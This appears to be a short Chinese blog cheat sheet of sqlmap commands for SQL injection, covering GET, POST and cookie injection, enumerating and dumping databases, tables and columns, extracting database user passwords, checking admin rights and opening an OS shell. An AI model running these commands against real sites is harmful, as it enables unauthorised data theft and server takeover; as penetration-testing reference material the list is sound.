欢迎光临
我们一直在努力

sqlmap命令

SQLMAP

GET   方式的注入  sqlmap.py -u “URL”

POST  方式的注入  sqlmap.py -u “URL” –data “POST参数=POST数值”

COOKIE 方式的注入  sqlmap.py -u “URL” –cookie “cookies 值”

爆数据库名(cookie根据实际的情况)  sqlmap.py -u “URL” [–cookie “cookies 值”] –dbs

爆目标数据库中的表     sqlmap.py -u “URL” [–cookie “cookies 值”] -D 数据库名 –tables

爆目标数据表字段  sqlmap.py -u “URL” [–cookie “cookies 值”] -D 数据库名 -T 表名 –columns

导出目标字段的数据 sqlmap.py  -u “URL”  [–cookie “cookies 值”] -D 数据库名 -T 表名 -C 要导出数据的字段名,多个字段用逗号分隔 –dump

爆出目标库有多少数据    sqlmap.py -u “URL” [–cookie “cookies 值”] -D 数据库名 –count

检测当前用户        sqlmap.py -u “URL” [–cookie “cookies 值”] –current-user

检测当前用户是否管理员  sqlmap.py -u “URL” [–cookie “cookies 值”] –is-dba

检测数据库用户       sqlmap.py -u “URL” [–cookie “cookies 值”]  –user -v 0

检测数据库用户密码    sqlmap.py -u “URL” [–cookie “cookies 值”]  –password -v 0

检测当前数据库       sqlmap.py -u “URL” [–cookie “cookies 值”] –current-db

多线程            -threading 5

如果是管理员,我们可以写Shell

操作系统Shell写入 

sqlmap.py -u “URL” [–cookie “cookies 值”] –os-shell

赞(0)
【声明】:本博客不参与任何交易,也非中介,仅记录个人感兴趣的主机测评结果和优惠活动,内容均不作直接、间接、法定、约定的保证。访问本博客请务必遵守有关互联网的相关法律、规定与规则。一旦您访问本博客,即表示您已经知晓并接受了此声明通告。